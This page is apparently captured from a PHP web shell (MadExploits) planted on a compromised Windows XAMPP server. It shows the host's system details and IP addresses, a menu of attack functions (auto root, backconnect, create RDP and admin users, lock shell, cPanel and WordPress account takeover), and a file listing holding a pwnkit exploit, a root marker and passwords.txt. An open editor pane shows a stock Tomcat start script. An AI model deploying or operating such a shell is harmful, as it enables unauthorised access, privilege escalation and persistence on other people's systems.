Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 18.216.11.230
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
[ HOME SHELL ]
Name
Size
Permission
Action
FileZillaFTP
[ DIR ]
drwxrwxrwx
MercuryMail
[ DIR ]
drwxrwxrwx
anonymous
[ DIR ]
drwxrwxrwx
apache
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
htdocs
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
install
[ DIR ]
drwxrwxrwx
licenses
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
mailoutput
[ DIR ]
drwxrwxrwx
mailtodisk
[ DIR ]
drwxrwxrwx
mysql
[ DIR ]
drwxrwxrwx
perl
[ DIR ]
drwxrwxrwx
php
[ DIR ]
drwxrwxrwx
phpMyAdmin
[ DIR ]
drwxrwxrwx
sendmail
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
tomcat
[ DIR ]
drwxrwxrwx
webalizer
[ DIR ]
drwxrwxrwx
webdav
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
apache_start.bat
436
B
-rwxrwxrwx
apache_stop.bat
190
B
-rwxrwxrwx
catalina_service.bat
10.08
KB
-rwxrwxrwx
catalina_start.bat
3.68
KB
-rwxrwxrwx
catalina_stop.bat
3.45
KB
-rwxrwxrwx
ctlscript.bat
2.67
KB
-rwxrwxrwx
filezilla_setup.bat
78
B
-rwxrwxrwx
filezilla_start.bat
150
B
-rwxrwxrwx
filezilla_stop.bat
149
B
-rwxrwxrwx
killprocess.bat
299
B
-rwxrwxrwx
mercury_start.bat
136
B
-rwxrwxrwx
mercury_stop.bat
60
B
-rwxrwxrwx
mysql_start.bat
471
B
-rwxrwxrwx
mysql_stop.bat
270
B
-rwxrwxrwx
passwords.txt
824
B
-rw-rw-rw-
properties.ini
792
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
readme_de.txt
7.32
KB
-rw-rw-rw-
readme_en.txt
7.2
KB
-rw-rw-rw-
service.exe
59.5
KB
-rwxrwxrwx
setup_xampp.bat
1.23
KB
-rwxrwxrwx
test_php.bat
1.63
KB
-rwxrwxrwx
uninstall.dat
257.84
KB
-rw-rw-rw-
uninstall.exe
6.28
MB
-rwxrwxrwx
xampp-control.exe
3.21
MB
-rwxrwxrwx
xampp-control.ini
173
B
-rw-rw-rw-
xampp_shell.bat
1.06
KB
-rwxrwxrwx
xampp_start.exe
116
KB
-rwxrwxrwx
xampp_stop.exe
116
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catalina_start.bat
@echo off SetLocal EnableDelayedExpansion cd /D %~dp0 :::::::::::::::::::::::::::::::::::: :: Set JAVA_HOME or JRE_HOME :: :::::::::::::::::::::::::::::::::::: title %~0 IF EXIST tomcat\logs\catalina.pid ( del /F/Q tomcat\logs\catalina.pid ) set TASKCMD=TASKLIST /V set FINDCMD=FIND /I FOR /F "tokens=2 delims= " %%A IN ('%TASKCMD% ^| %FINDCMD% "%~0"') DO SET MyPID=%%A echo. echo [XAMPP]: Searching for JDK or JRE HOME with reg query ... set JDKKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Development Kit set JDKKeyName64Short=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\JDK set AdoptOpenJDKKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\AdoptOpenJDK\JDK set JREKeyName64=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment set JREKeyName64Short=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\JRE set AdoptOpenJDKKeyName64JRE=HKEY_LOCAL_MACHINE\SOFTWARE\AdoptOpenJDK\JRE reg query "%JDKKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JDK echo . [XAMPP]: Looking for 32 bit JDK on 64 bit machine goto FINDJDK64SHORT ) set KeyName=%JDKKeyName64% goto JDKRUN :FINDJDK64SHORT reg query "%JDKKeyName64Short%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit JDK echo . [XAMPP]: Looking for 32 bit or 64 bit on 64 bit machine with short name goto FINDADOPTOPENJDK64 ) set KeyName=%JDKKeyName64Short% goto JDKRUN :FINDADOPTOPENJDK64 reg query "%AdoptOpenJDKKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit AdoptOpenJDK echo . [XAMPP]: Looking for 32 bit or 64 bit JRE goto FINDJRE64 ) set KeyName=%AdoptOpenJDKKeyName64% goto JDKRUN :FINDJRE64 reg query "%JREKeyName64%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JRE with long name echo . [XAMPP]: Looking for 32 bit or 64 bit JRE on 64 bit machine with short name goto FINDJRE64SHORT ) set KeyName=%JREKeyName64% goto JRERUN :FINDJRE64SHORT reg query "%JREKeyName64Short%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit JRE with short name echo . [XAMPP]: Looking for 32 bit or 64 bit AdoptOpenJDK JRE on 64 bit machine goto FINDADOPTOPENJDK64JRE ) set KeyName=%JREKeyName64Short% goto JRERUN :FINDADOPTOPENJDK64JRE reg query "%AdoptOpenJDKKeyName64JRE%" /s if %ERRORLEVEL% EQU 1 ( echo . [XAMPP]: Could not find 32 bit or 64 bit AdoptOpenJDK JRE echo . [XAMPP]: Looking for 32 JRE on 64 bit machine goto ENDERROR ) set KeyName=%AdoptOpenJDKKeyName64JRE% goto JDKRUN :JDKRUN echo. echo [XAMPP]: Using JDK set "CURRENT_DIR=%cd%" set "CATALINA_HOME=%CURRENT_DIR%\tomcat" if NOT DEFINED JAVA_HOME ( set Cmd=reg query "!KeyName!" /s for /f "tokens=2*" %%i in ('!Cmd! ^| find "JavaHome"') do set JAVA_HOME=%%j ) echo. echo [XAMPP]: Seems fine! echo [XAMPP]: Set JAVA_HOME : %JAVA_HOME% echo [XAMPP]: Set CATALINA_HOME : %CATALINA_HOME% echo. if %ERRORLEVEL% == 0 ( echo %MyPID% > tomcat\logs\catalina.pid ) "%CATALINA_HOME%\bin\catalina.bat" run goto END :JRERUN echo. echo [XAMPP]: Using JRE set "CURRENT_DIR=%cd%" set "CATALINA_HOME=%CURRENT_DIR%\tomcat" if NOT DEFINED JRE_HOME ( set Cmd=reg query "!KeyName!" /s for /f "tokens=2*" %%i in ('!Cmd! ^| find "JavaHome"') do set JRE_HOME=%%j ) echo. echo [XAMPP]: Seems fine! echo [XAMPP]: Set JRE_HOME : %JRE_HOME% echo [XAMPP]: Set CATALINA_HOME : %CATALINA_HOME% echo. if %ERRORLEVEL% == 0 ( echo %MyPID% > tomcat\logs\catalina.pid ) "%CATALINA_HOME%\bin\catalina.bat" run goto END :ENDERROR exit 1 :END echo done. SetLocal DisableDelayedExpansion pause
Close